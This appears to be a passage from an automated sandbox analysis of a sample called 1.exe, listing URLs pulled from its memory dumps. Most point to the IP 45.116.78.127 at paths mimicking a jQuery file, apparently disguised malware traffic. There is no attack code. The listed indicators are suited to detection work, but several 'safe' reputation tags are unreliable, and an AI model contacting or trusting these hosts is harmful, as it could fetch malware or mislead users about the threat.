        http://code.jquery.com/1.exe, 00000000.00000003.2450698374.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649720745.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2412463885.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273403913.000002B669D9C000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2221934852.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273403913.000002B669D3C000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688451879.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2922884622.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2337185318.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883830642.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2903576644.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2815589341.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2181244688.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3234673628.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2393356882.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2941717680.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158599501.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2355972071.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://45.116.78.127/crosic1.exe, 00000000.00000003.2450698374.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://45.116.78.127/jquery-3.3.1.min.jsicate1.exe, 00000000.00000003.2200192483.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2181244688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://45.116.78.127/jquery-3.3.1.min.jsm1.exe, 00000000.00000003.2450808261.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2529187313.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2200192483.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2318143913.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273561662.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2547616928.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2220224689.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2299019879.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2469922899.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883924322.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2241098849.000002B669DFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://45.116.78.127/jquery-3.3.1.min.js-end-point:1.exe, 00000000.00000003.2220224689.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://45.116.78.127/p1.exe, 00000000.00000003.2649720745.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688451879.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://45.116.78.127/jquery-3.3.1.min.jsp1.exe, 00000000.00000003.2200192483.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2220224689.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://45.116.78.127/jquery-3.3.1.min.jsv1.exe, 00000000.00000003.2570626524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://45.116.78.127/jquery-3.3.1.min.jsi%1.exe, 00000000.00000003.2220224689.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://45.116.78.127/jquery-3.3.1.min.jss1.exe, 00000000.00000003.3006338364.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2987847144.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://45.116.78.127/der1.exe, 00000000.00000003.2941717680.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158599501.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3138732447.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196282775.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://45.116.78.127/jquery-3.3.1.min.jsY1.exe, 00000000.00000003.2529187313.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2547616928.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2570626524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://45.116.78.127/jquery-3.3.1.min.jsa1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883924322.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://45.116.78.127/roviderU1.exe, 00000000.00000003.3158738259.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3045966688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196424317.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2923043972.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3138732447.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2941828835.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2960557486.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3006338364.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3083402749.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3177724289.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3119307893.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3064219568.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3102254380.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883924322.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3025923840.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2987847144.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://45.116.78.127/jquery-3.3.1.min.jse1.exe, 00000000.00000003.2431369324.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2611004523.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883924322.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2987847144.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://code.jquery.com/I1.exe, 00000000.00000003.2068730463.000002B669D9E000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://45.116.78.127/jquery-3.3.1.min.jsI1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2611004523.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://45.116.78.127/16.78.127/l1.exe, 00000000.00000003.2337185318.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2355972071.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://45.116.78.127/jquery-3.3.1.min.jsG1.exe, 00000000.00000003.2200192483.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2181244688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2260354455.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2220224689.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2241098849.000002B669DFA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://45.116.78.127/jquery-3.3.1.min.jsM1.exe, 00000000.00000003.3215560010.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3234770394.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273561662.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196424317.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2941828835.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2960557486.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://45.116.78.127/jquery-3.3.1.min.js/rovider1.exe, 00000000.00000003.3158738259.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3138732447.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3119307893.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3102254380.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.116.78.127/jquery-3.3.1.min.jsQ1.exe, 00000000.00000003.2431369324.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2355972071.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2337370173.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2412570457.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2393456740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2374875810.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://45.116.78.127/jquery-3.3.1.min.jsP1.exe, 00000000.00000003.3158738259.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3177724289.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://45.116.78.127/jquery-3.3.1.min.jsO1.exe, 00000000.00000003.2260354455.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2241098849.000002B669DFA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://45.116.78.127/jquery-3.3.1.min.jsU1.exe, 00000000.00000003.3196424317.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://45.116.78.127/dep1.exe, 00000000.00000003.2591343411.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196282775.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://45.116.78.127/)1.exe, 00000000.00000003.2883924322.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://45.116.78.127/jquery-3.3.1.min.jsdb-53011b87bd06ad1.exe, 00000000.00000003.2529187313.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2547616928.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2960557486.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://45.116.78.127/jquery-3.3.1.min.js=1.exe, 00000000.00000003.3215560010.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2489366194.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3102254380.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://45.116.78.127/16.78.127/1.exe, 00000000.00000003.2922884622.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883830642.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2903576644.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2941717680.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://45.116.78.127/jquery-3.3.1.min.jsdb-53011b87bd06C1.exe, 00000000.00000003.2630449376.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://45.116.78.127/jquery-3.3.1.min.jsE1.exe, 00000000.00000003.3045966688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2547616928.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2611004523.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2960557486.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3006338364.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3083402749.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3064219568.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2570626524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3025923840.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2987847144.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://45.116.78.127/jquery-3.3.1.min.jsC1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://45.116.78.127/91.exe, 00000000.00000003.2611004523.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://code.jquery.com/i1.exe, 00000000.00000003.2240965688.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2279731119.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2181244688.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2299019879.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2200281283.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2162144150.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2260354455.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2220224689.000002B669DC1000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://45.116.78.127/jquery-3.3.1.min.js)1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2611004523.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.116.78.127/=1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158738259.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3138732447.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3064219568.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.116.78.127/jquery-3.3.1.min.js.1.exe, 00000000.00000003.2279731119.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2299019879.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://code.jquery.com/)v1.exe, 00000000.00000002.3273403913.000002B669D3C000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://45.116.78.127/jquery-3.3.1.min.jsim1.exe, 00000000.00000003.3158738259.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3138732447.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/jquery-3.3.1.min.js01.exe, 00000000.00000003.2570626524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/jquery-3.3.1.min.js/1.exe, 00000000.00000002.3273561662.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196424317.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/jquery-3.3.1.min.js51.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/jquery-3.3.1.min.jsic1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/jquery-3.3.1.min.jsdb-53011b87bd061.exe, 00000000.00000003.2431369324.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2318143913.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2355972071.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2923043972.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2337370173.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2412570457.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3083402749.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3119307893.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3064219568.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3102254380.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2393456740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2374875810.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/jquery-3.3.1.min.jsdb-53011b87bd06O1.exe, 00000000.00000003.2529187313.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2547616928.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2509193576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/jquery-3.3.1.min.js/e1.exe, 00000000.00000003.3025923840.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.116.78.127/tography1.exe, 00000000.00000003.2630449376.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688451879.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158599501.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591343411.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2611004523.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
